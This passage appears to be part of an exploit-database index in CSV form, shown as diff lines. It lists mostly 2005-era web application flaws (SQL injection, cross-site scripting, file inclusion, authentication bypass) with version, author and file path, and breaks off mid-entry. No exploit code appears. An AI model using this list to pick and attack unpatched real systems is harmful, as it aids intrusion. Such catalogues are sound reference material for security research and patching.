+26283,exploits/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-19,deluxe@security-project.org,webapps,php, +26284,exploits/php/webapps/26284.txt,"MX Shop 3.2 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",webapps,php, +26285,exploits/php/webapps/26285.txt,"Hesk 0.92/0.93 - Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",webapps,php, +26286,exploits/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,webapps,php, +26287,exploits/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,webapps,php, +26300,exploits/php/webapps/26300.txt,"LucidCMS 2.0 - 'index.php' Cross-Site Scripting",2005-09-27,X1ngBox,webapps,php, +26302,exploits/php/webapps/26302.txt,"TWiki TWikiUsers - INCLUDE Function Arbitrary Command Execution",2005-09-28,JChristophFuchs,webapps,php, +26303,exploits/php/webapps/26303.txt,"CubeCart 3.0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-28,Lostmon,webapps,php, +26304,exploits/php/webapps/26304.txt,"CubeCart 3.0.3 - 'cart.php?redir' Cross-Site Scripting",2005-09-28,Lostmon,webapps,php, +26305,exploits/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting",2005-09-29,anonymous,webapps,php, +26307,exploits/php/webapps/26307.txt,"LucidCMS 2.0 - Login SQL Injection",2005-09-29,rgod,webapps,php, +26308,exploits/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 - 'blank.html?id' Cross-Site Scripting",2005-09-30,ss_contacts,webapps,php, +26309,exploits/php/webapps/26309.txt,"IceWarp Web Mail 5.5.1 - 'calendar_d.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,webapps,php, +26310,exploits/php/webapps/26310.txt,"IceWarp Web Mail 5.5.1 - 'calendar_m.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,webapps,php, +26311,exploits/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 - 'calendar_w.html?createdataCX' Cross-Site Scripting",2005-09-30,ss_contacts,webapps,php, +26312,exploits/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - 'Printfaq.php' Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",webapps,php, +26313,exploits/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,webapps,php, +26386,exploits/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple SQL Injections",2005-10-24,papipsycho,webapps,php, +26387,exploits/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - 'artid' SQL Injection",2005-10-24,papipsycho,webapps,php, +26316,exploits/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",webapps,php, +26319,exploits/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",webapps,php, +26328,exploits/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,rgod,webapps,php, +26324,exploits/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",webapps,php, +26335,exploits/asp/webapps/26335.txt,"Aenovo - Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",webapps,asp, +26337,exploits/php/webapps/26337.php,"Cyphor 0.19 - 'lostpwd.php?nick' SQL Injection",2005-10-08,rgod,webapps,php, +26338,exploits/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php?fid' SQL Injection",2005-10-08,retrogod@aliceposta.it,webapps,php, +26339,exploits/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php?t_login' Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,webapps,php, +26343,exploits/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",webapps,php, +26344,exploits/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",webapps,cgi, +26345,exploits/php/webapps/26345.txt,"YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,webapps,php, +26346,exploits/php/webapps/26346.txt,"Accelerated Mortgage Manager - 'Password' SQL Injection",2005-10-13,imready4chillin,webapps,php, +26347,exploits/php/webapps/26347.txt,"Gallery 2.0 - 'main.php' Directory Traversal",2005-10-14,"Michael Dipper",webapps,php, +26348,exploits/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,webapps,php, +26349,exploits/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,webapps,php, +26350,exploits/php/webapps/26350.txt,"PunBB 1.2.x - 'search.php' SQL Injection",2005-10-15,Devil_box,webapps,php, +26351,exploits/asp/webapps/26351.txt,"Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,webapps,asp, +26354,exploits/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,webapps,jsp, +26355,exploits/php/webapps/26355.txt,"MySource 2.14 - 'upgrade_in_progress_backend.php?target_url' Cross-Site Scripting",2005-10-18,"Secunia Research",webapps,php, +26356,exploits/php/webapps/26356.txt,"MySource 2.14 - 'insert_table.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",webapps,php, +26357,exploits/php/webapps/26357.txt,"MySource 2.14 - 'edit_table_cell_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",webapps,php, +26358,exploits/php/webapps/26358.txt,"MySource 2.14 - 'header.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",webapps,php, +26359,exploits/php/webapps/26359.txt,"MySource 2.14 - 'edit_table_row_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",webapps,php, +26360,exploits/php/webapps/26360.txt,"MySource 2.14 - 'edit_table_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",webapps,php, +26361,exploits/php/webapps/26361.txt,"MySource 2.14 - 'edit_table_cell_type_wysiwyg.php?Stylesheet' Cross-Site Scripting",2005-10-18,"Secunia Research",webapps,php, +26362,exploits/php/webapps/26362.txt,"MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions",2005-10-18,"Secunia Research",webapps,php, +26363,exploits/php/webapps/26363.txt,"MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26364,exploits/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26365,exploits/php/webapps/26365.txt,"MySource 2.14 - 'Request.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26366,exploits/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,webapps,php, +26369,exploits/php/webapps/26369.txt,"MySource 2.14 - 'mail.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26370,exploits/php/webapps/26370.txt,"MySource 2.14 - 'Date.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26371,exploits/php/webapps/26371.txt,"MySource 2.14 - 'Span.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26372,exploits/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26373,exploits/php/webapps/26373.txt,"MySource 2.14 - 'mime.php?PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",webapps,php, +26377,exploits/php/webapps/26377.txt,"PHP-Nuke Search Module - 'modules.php' Directory Traversal",2005-10-19,sp3x@securityreason.com,webapps,php, +26378,exploits/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",webapps,php, +26379,exploits/php/webapps/26379.txt,"Chipmunk Forum - 'quote.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",webapps,php, +26380,exploits/php/webapps/26380.txt,"Chipmunk Forum - 'recommend.php?ID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",webapps,php, +26381,exploits/php/webapps/26381.txt,"Chipmunk Directory - 'recommend.php?entryID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",webapps,php, +26383,exploits/php/webapps/26383.txt,"Zomplog 3.3/3.4 - 'detail.php' HTML Injection",2005-10-22,sikikmail,webapps,php, +26384,exploits/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusions",2005-10-22,abducter_minds@yahoo.com,webapps,php, +26385,exploits/php/webapps/26385.txt,"FlatNuke 2.5.x - 'index.php' Cross-Site Scripting",2005-10-26,alex@aleksanet.com,webapps,php, +26388,exploits/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - 'dl_id' SQL Injection",2005-10-24,papipsycho,webapps,php, +26389,exploits/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - 'link_id' SQL Injection",2005-10-24,papipsycho,webapps,php, +26390,exploits/php/webapps/26390.txt,"saPHP Lesson - 'add.php?forumid' SQL Injection",2005-10-26,almaster,webapps,php, +26391,exploits/php/webapps/26391.html,"SiteTurn Domain Manager Pro - Admin Panel Cross-Site Scripting",2005-10-24,"farhad koosha",webapps,php, +26392,exploits/php/webapps/26392.txt,"phpMyAdmin 2.x - 'queryframe.php' Cross-Site Scripting",2005-05-20,"Tobias Klein",webapps,php, +26393,exploits/php/webapps/26393.txt,"phpMyAdmin 2.x - 'server_databases.php' Cross-Site Scripting",2005-05-20,"Tobias Klein",webapps,php, +26394,exploits/php/webapps/26394.txt,"MWChat 6.8 - 'chat.php' SQL Injection",2005-05-21,rgod,webapps,php, +26395,exploits/php/webapps/26395.txt,"Basic Analysis and Security Engine (BASE) 1.2 - 'Base_qry_main.php' SQL Injection",2005-10-25,"Remco Verhoef",webapps,php, +26396,exploits/php/webapps/26396.pl,"MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection",2005-10-26,Animal,webapps,php, +26397,exploits/php/webapps/26397.txt,"IPBProArcade 2.5.2 - 'GameID' SQL Injection",2005-10-26,almaster,webapps,php, +26398,exploits/cgi/webapps/26398.txt,"RSA ACE Agent 5.x - Image Cross-Site Scripting",2005-10-26,"Bernhard Mueller",webapps,cgi, +26399,exploits/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,webapps,php, +26400,exploits/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,webapps,php, +26401,exploits/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,webapps,hardware, +26405,exploits/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php?gid' SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,webapps,php, +26406,exploits/php/webapps/26406.txt,"Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities",2013-06-24,"Glafkos Charalambous",webapps,php, +27541,exploits/php/webapps/27541.txt,"DbbS 2.0 - 'Topics.php' SQL Injection",2006-03-31,DaBDouB-MoSiKaR,webapps,php, +27542,exploits/php/webapps/27542.txt,"SoftBiz Image Gallery - 'mage_desc.php' Multiple SQL Injections",2006-03-31,Linux_Drox,webapps,php, +27543,exploits/php/webapps/27543.txt,"SoftBiz Image Gallery - 'template.php?provided' SQL Injection",2006-03-31,Linux_Drox,webapps,php, +26408,exploits/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,AtT4CKxT3rR0r1ST,webapps,php, +26410,exploits/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,webapps,php, +26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php, +26415,exploits/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,webapps,hardware, +26416,exploits/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php?id' SQL Injection",2013-06-24,"CWH Underground",webapps,php, +26827,exploits/php/webapps/26827.txt,"QuickPayPro 3.1 - 'popups.edit.php?popupid' SQL Injection",2005-12-14,r0t,webapps,php, +26423,exploits/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion",2005-10-26,"Andreas Sandblad",webapps,php, +26425,exploits/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,webapps,php, +26426,exploits/asp/webapps/26426.html,"Techno Dreams (Multiple Scripts) - Multiple SQL Injections",2005-10-26,"farhad koosha",webapps,asp, +26427,exploits/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL Injection",2005-10-26,svsecurity,webapps,php, +26428,exploits/php/webapps/26428.html,"PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection",2005-10-26,bhfh01,webapps,php, +26429,exploits/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - '/computers/default.asp?Direction' SQL Injection",2005-10-27,"Dennis Rand",webapps,asp, +26430,exploits/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - '/reports/default.asp' Multiple SQL Injections",2005-10-27,"Dennis Rand",webapps,asp, +26431,exploits/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",webapps,php, +26432,exploits/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php?section' Local File Inclusion",2005-10-27,"Andreas Sandblad",webapps,php, +26433,exploits/php/webapps/26433.txt,"ATutor 1.x - 'print.php?section' Remote File Inclusion",2005-10-27,"Andreas Sandblad",webapps,php, +26434,exploits/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,webapps,php, +26435,exploits/asp/webapps/26435.txt,"ASP Fast Forum - 'error.asp' Cross-Site Scripting",2005-10-27,syst3m_f4ult,webapps,asp, +26436,exploits/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass",2005-10-29,"Preben Nylokken",webapps,php, +26437,exploits/php/webapps/26437.txt,"PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access",2005-10-29,Zeelock,webapps,php, +26438,exploits/php/webapps/26438.txt,"Invision Gallery 2.0.3 - 'index.php' SQL Injection",2005-10-31,almaster,webapps,php, +26439,exploits/asp/webapps/26439.txt,"Snitz Forum 2000 - 'post.asp' Cross-Site Scripting",2005-10-31,h4xorcrew,webapps,asp, +26440,exploits/php/webapps/26440.txt,"PHPCafe Tutorial Manager - 'index.php' SQL Injection",2005-10-31,almaster,webapps,php, +26441,exploits/php/webapps/26441.txt,"OaBoard 1.0 - 'forum.php' Multiple SQL Injections",2005-10-31,abducter_minds@yahoo.com,webapps,php, +26442,exploits/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",webapps,php, +26444,exploits/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - 'comersus_Backoffice_supportError.asp?error' Cross-Site Scripting",2005-10-31,_6mO_HaCk,webapps,asp, +26445,exploits/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,webapps,asp, +26446,exploits/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - 'Addrbook.php' SQL Injection",2005-11-01,almaster,webapps,php, +26447,exploits/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,webapps,php, +26449,exploits/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",webapps,php, +26453,exploits/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php?type' Remote Code Execution",2013-06-26,infodox,webapps,php, +26455,exploits/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",webapps,php, +26456,exploits/php/webapps/26456.txt,"XMB Forum 1.9.3 - 'post.php' SQL Injection",2005-11-01,almaster,webapps,php, +26458,exploits/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,webapps,php, +26459,exploits/php/webapps/26459.txt,"PHPWebThings 0.4.4 - 'forum.php' Cross-Site Scripting",2005-11-02,Linux_Drox,webapps,php, +26461,exploits/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,webapps,cgi, +26462,exploits/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,webapps,cgi, +26463,exploits/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,webapps,cgi, +26465,exploits/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php, +26466,exploits/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php, +26467,exploits/php/webapps/26467.txt,"PHP Handicapper - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php, +26468,exploits/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,webapps,php, +26469,exploits/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,webapps,php, +26470,exploits/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,webapps,php, +26473,exploits/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,webapps,asp, +26474,exploits/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,webapps,php, +26475,exploits/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",webapps,cgi, +26476,exploits/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,webapps,php, +26477,exploits/php/webapps/26477.txt,"XMB Forum 1.9.3 - 'u2u.php' Cross-Site Scripting",2005-11-07,"HACKERS PAL",webapps,php, +26478,exploits/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,benjilenoob,webapps,php, +26480,exploits/php/webapps/26480.txt,"ToendaCMS 0.6.1 - 'admin.php' Directory Traversal",2005-11-07,"Bernhard Mueller",webapps,php, +26481,exploits/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php?id' SQL Injection",2005-11-07,"Tobias Klein",webapps,php, +26482,exploits/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php?id' SQL Injection",2005-11-07,"Tobias Klein",webapps,php, +26483,exploits/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,"Tobias Klein",webapps,php, +26484,exploits/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php?id' Cross-Site Scripting",2005-11-07,"Tobias Klein",webapps,php, +26485,exploits/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php?find' Cross-Site Scripting",2005-11-07,"Tobias Klein",webapps,php, +26486,exploits/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",webapps,php, +26487,exploits/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - 'frameset.htm?sap-syscmd' Cross-Site Scripting",2005-11-09,"Leandro Meiners",webapps,php, +26488,exploits/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - Open Redirection",2005-11-09,"Leandro Meiners",webapps,php, +26490,exploits/php/webapps/26490.txt,"TikiWiki 1.9 - 'Tiki-view_forum_thread.php' Cross-Site Scripting",2005-11-09,"Moritz Naumann",webapps,php, +26496,exploits/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,webapps,hardware,8080 +26499,exploits/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,webapps,php, +26500,exploits/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php?File' SQL Injection",2005-11-12,A.1.M,webapps,php, +26501,exploits/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,webapps,php, +26502,exploits/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",webapps,php, +26503,exploits/php/webapps/26503.txt,"Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection",2005-11-14,"HACKERS PAL",webapps,php, +26504,exploits/php/webapps/26504.txt,"Wizz Forum - 'forumreply.php?TopicID' SQL Injection",2005-11-14,"HACKERS PAL",webapps,php, +26505,exploits/php/webapps/26505.txt,"Codegrrl - 'Protection.php' Code Execution",2005-11-14,"Robin Verton",webapps,php, +26506,exploits/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe?tsurl' Arbitrary Article Access",2005-11-15,"Rafi Nahum",webapps,cgi, +26507,exploits/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' Cross-Site Scripting",2005-11-15,"Rafi Nahum",webapps,cgi, +26508,exploits/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' SQL Injection",2005-11-15,"Rafi Nahum",webapps,cgi, +26509,exploits/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - 'ts.cgi' File Existence Enumeration",2005-11-15,"Rafi Nahum",webapps,cgi, +26510,exploits/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injections",2005-11-15,abducter_minds@yahoo.com,webapps,php, +26511,exploits/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,webapps,php, +26512,exploits/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php?form_lang' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",webapps,php, +26513,exploits/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",webapps,php, +26514,exploits/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",webapps,php, +26515,exploits/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",webapps,php, +26516,exploits/php/webapps/26516.txt,"Ekinboard 1.0.3 - 'profile.php' Cross-Site Scripting",2005-11-15,trueend5,webapps,php, +26829,exploits/php/webapps/26829.txt,"QuickPayPro 3.1 - 'subscribers.tracking.edit.php?subtrackingid' SQL Injection",2005-12-14,r0t,webapps,php, +26830,exploits/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,webapps,php, +26521,exploits/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,webapps,php, +27437,exploits/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php?st' Cross-Site Scripting",2006-03-17,Mr.SNAKE,webapps,php, +26527,exploits/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,webapps,hardware, +26528,exploits/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",webapps,hardware, +26530,exploits/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Remote Code Execution",2013-07-01,"Xavier Mehrenberger",webapps,php, +26532,exploits/jsp/webapps/26532.txt,"Revize CMS - 'Query_results.jsp' SQL Injection",2005-11-17,Lostmon,webapps,jsp, +26533,exploits/jsp/webapps/26533.txt,"Revize CMS - 'Revize.XML' Information Disclosure",2005-11-17,Lostmon,webapps,jsp, +26534,exploits/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet - Cross-Site Scripting",2005-11-17,Lostmon,webapps,jsp, +26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php, +26537,exploits/asp/webapps/26537.html,"VP-ASP Shopping Cart - 'Shopadmin.asp' HTML Injection",2005-11-17,ConcorDHacK,webapps,asp, +26538,exploits/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - 'options.php?/ viewforum.php' SQL Injection",2005-11-19,"Robin Verton",webapps,php, +26539,exploits/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - 'popup.php' Cross-Site Scripting",2005-11-21,[GB],webapps,php, +26541,exploits/php/webapps/26541.txt,"SimplePoll - 'results.php' SQL Injection",2005-11-21,stranger-killer,webapps,php, +26543,exploits/php/webapps/26543.txt,"APBoard - 'thread.php' SQL Injection",2005-11-21,ksa_ksa82,webapps,php, +26544,exploits/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,webapps,php, +26545,exploits/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,webapps,php, +26546,exploits/php/webapps/26546.txt,"PHPPost 1.0 - 'profile.php?user' Cross-Site Scripting",2005-11-21,trueend5,webapps,php, +26547,exploits/php/webapps/26547.txt,"PHPPost 1.0 - 'mail.php?user' Cross-Site Scripting",2005-11-21,trueend5,webapps,php, +26549,exploits/php/webapps/26549.txt,"Torrential 1.2 - 'Getdox.php' Directory Traversal",2005-11-22,Shell,webapps,php, +26550,exploits/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function 'User' SQL Injection",2005-11-22,"Moritz Naumann",webapps,cgi, +26551,exploits/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple SQL Injections",2005-11-22,"Moritz Naumann",webapps,cgi, +26552,exploits/cgi/webapps/26552.txt,"OTRS 2.0 - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-11-22,"Moritz Naumann",webapps,cgi, +26553,exploits/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",webapps,php, +26828,exploits/php/webapps/26828.txt,"QuickPayPro 3.1 - 'customer.tickets.view.php' Multiple SQL Injections",2005-12-14,r0t,webapps,php, +26559,exploits/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting",2005-11-22,"Moritz Naumann",webapps,php, +26560,exploits/php/webapps/26560.txt,"PmWiki 2.0.x - Search Cross-Site Scripting",2005-11-22,"Moritz Naumann",webapps,php, +26561,exploits/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - 'Process.php' SQL Injection",2005-11-23,r0t,webapps,php, +26562,exploits/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 - 'subcategory.php?cl' SQL Injection",2005-11-23,r0t3d3Vil,webapps,php, +26563,exploits/php/webapps/26563.txt,"AFFCommerce Shopping Cart 1.1.4 - 'ItemInfo.php?item_id' SQL Injection",2005-11-23,r0t3d3Vil,webapps,php, +26564,exploits/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 - 'ItemReview.php?item_id' SQL Injection",2005-11-23,r0t3d3Vil,webapps,php, +26565,exploits/php/webapps/26565.txt,"Tunez 1.21 - 'songinfo.php?song_id' SQL Injection",2005-11-23,r0t3d3Vil,webapps,php, +26566,exploits/php/webapps/26566.txt,"Tunez 1.21 - 'search.php?searchFor' Cross-Site Scripting",2005-11-23,r0t3d3Vil,webapps,php, +26567,exploits/php/webapps/26567.txt,"WSN Forum 1.21 - 'memberlist.php' SQL Injection",2005-11-23,r0t,webapps,php, +26568,exploits/php/webapps/26568.txt,"OmnistarLive 5.2 - Multiple SQL Injections",2005-11-23,r0t,webapps,php, +26569,exploits/php/webapps/26569.txt,"PHP Labs Survey Wizard - SQL Injection",2005-11-23,r0t,webapps,php, +26570,exploits/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL 